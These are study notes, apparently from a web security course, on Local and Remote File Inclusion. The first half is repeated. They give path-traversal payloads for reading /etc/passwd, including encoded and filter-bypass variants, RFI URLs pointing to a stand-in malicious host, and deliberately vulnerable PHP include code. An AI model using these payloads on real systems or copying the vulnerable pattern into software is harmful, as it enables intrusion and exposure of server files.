LFI/RFI:
---------

Imapct of File inclusion: 
-------------------------
1. code execution on server 
2. code execution client side 
3. dos attack 
4. information disclosure 

Two types of File Inclusion:
-=-=-=-=-=-=-=--=-=-=-=-=-=
1. Local file inclusion [ LFI ]
2. Remote File Inclusion [ RFI ]
+++++++++++++++++++++++++++
1. Local file inclusion:
~~~~~~~~~~~~~~~~~~~~~~~~
anyparameter=somelocalfile 

example:
target.com/index.php?referer=login.php

2. Remote File Inclusion: 
~~~~~~~~~~~~~~~~~~~~~~~~~

anyparmeter=remoteweb.com/file 

example: 
target.com/index.php?share=http://facebook.com/status?id=12672

Some Common Parameters:
-----------------------
LFI:
[
?file=
?document=
?folder=,root,route,path,pg,style,pdf,template,php_path,doc, many more...]

RFI:
[dest,redirect,uri,path,continue,url,window,next,data,reference,site,html,val,validate,domain,callback,return,page,feed,host,port,to,out,view,dir,show,navigation,open, many more...]

--------------------------------------------

LFI Vs RFI :
------------
LFI:
----
if target web server is reside on Linux Apache Platform 

DocumentRoot: 
# ls /var/www/html/
index.php trump.jpeg

server path will be /var/www/html/trump.jpeg 

target.com/index.php?file=trump.jpeg

system configuration file by going root directory [/]

Example: /etc/passwd
any.com/index.php?file=../../../etc/passwd







RFI:
----
[file,dest,redirect,uri,path,continue,url,window,next,data,reference,site,html,val,validate,domain,callback,return,page,feed,host,port,to,out,view,dir,show,navigation,open, many more...]








any.com/index.php?file=http://remoteweb.com/trump.jpg 

any.com/index.php?file=http://malacious.com/malacious.html





<html><script>alert(1)</script>
</html>
-----------------------------------------

LFI Hunting: 
------------
1. You have to find a parameter that includes some local file.

target - 
testphp.vulnweb.com

YOU CAN SPIDER/CRAWL THE TARGET AND SEARCH FOR THE POSSIBLE PARAMETERS. eg: ?file=

LFI through Intruder:
---------------------
1. You have to find a parameter that includes some local file.
2. Try LFI Payloads

=======================================================================================

LFI/RFI:
---------

Imapct of File inclusion: 
-------------------------
1. code execution on server 
2. code execution client side 
3. dos attack 
4. information disclosure 

Two types of File Inclusion:
-=-=-=-=-=-=-=--=-=-=-=-=-=
1. Local file inclusion [ LFI ]
2. Remote File Inclusion [ RFI ]
+++++++++++++++++++++++++++
1. Local file inclusion:
~~~~~~~~~~~~~~~~~~~~~~~~
anyparameter=somelocalfile 

example:
target.com/index.php?referer=login.php

2. Remote File Inclusion: 
~~~~~~~~~~~~~~~~~~~~~~~~~

anyparmeter=remoteweb.com/file 

example: 
target.com/index.php?share=http://facebook.com/status?id=12672

Some Common Parameters:
-----------------------
LFI:
[file,document,folder,root,route,path,pg,style,pdf,template,php_path,doc, many more...]

RFI:
[dest,redirect,uri,path,continue,url,window,next,data,reference,site,html,val,validate,domain,callback,return,page,feed,host,port,to,out,view,dir,show,navigation,open, many more...]

--------------------------------------------

LFI Vs RFI :
------------
LFI:
----
if target web server is reside on Linux Apache Platform 

DocumentRoot: 
# ls /var/www/html/
index.php trump.jpeg

server path will be /var/www/html/trump.jpeg 

target.com/index.php?file=trump.jpeg

system configuration file by going root directory [/]

Example: /etc/passwd
any.com/index.php?file=../../../etc/passwd







RFI:
----
[file,dest,redirect,uri,path,continue,url,window,next,data,reference,site,html,val,validate,domain,callback,return,page,feed,host,port,to,out,view,dir,show,navigation,open, many more...]








any.com/index.php?file=http://remoteweb.com/trump.jpg 

any.com/index.php?file=http://malacious.com/malacious.html






























Local File Inclusion
````````````````````
Here is an example code of how a page could include PHP code, from a different file, inside the file that uses the include statement:

index.php:
``````````
<?php
 $file = $_GET['lang'];
 include('/var/www/html/' . $file)
?>

index.php?lang=en.php






The attack:
```````````
An application is vulnerable every time a developer uses the include functions, with an input provided by a user, without validating it.

Example URL: http://172.30.124.12:9000/index.php?lang=/../../etc/passwd

++++++++++++++++++++++++++++++++++++++++++++++++++
# cat index.php
<?php
   $file = $_GET['lang'];
   if(isset($file))
   {
       include("$file");
   }
   else
   {
       include("home.php");
   }
?>

# cat home.php
<?php echo "<img src='https://media.tenor.com/NkBr4oPyL8EAAAAi/habibi-meme.gif' alt='habibi' />"; ?>

The attack:
```````````
http://172.30.124.12:9000/index.php?lang=../../../etc/passwd
++++++++++++++++++++++++++++++++++++++++++++++++++




+++++++++++++++++++++++++++++++++++++++++++++++++++++
That application is detecting “.” “/” in the lang parameter:







<?php

if(isset($_GET['lang']))
{
        $file=str_replace('../','',$_GET['lang']);
        $file=str_replace('./','',$file);
        echo @file_get_contents('./'.$file);
}
else { echo "<img src='https://media.tenor.com/9jnZ38AZ5R4AAAAC/arabpunkz-habibi.gif' alt='habibi' />"; }

?>


> URL Encoding of “.” and “/” are “%2E” and “%2F”

%2e%2e%2f%2e%2e%2fetc%2fpasswd



OR
> Double Encoding




======================================
index.php?lang=../../../../etc/passwd
'../',''
'./',''

..../ = ../ = '.'
.// = '/'

....// = ../



index.php?lang=....//....//....//....//etc/passwd

..../  ==> ../ ==> ..
.// ==> ./  ==> /


________________________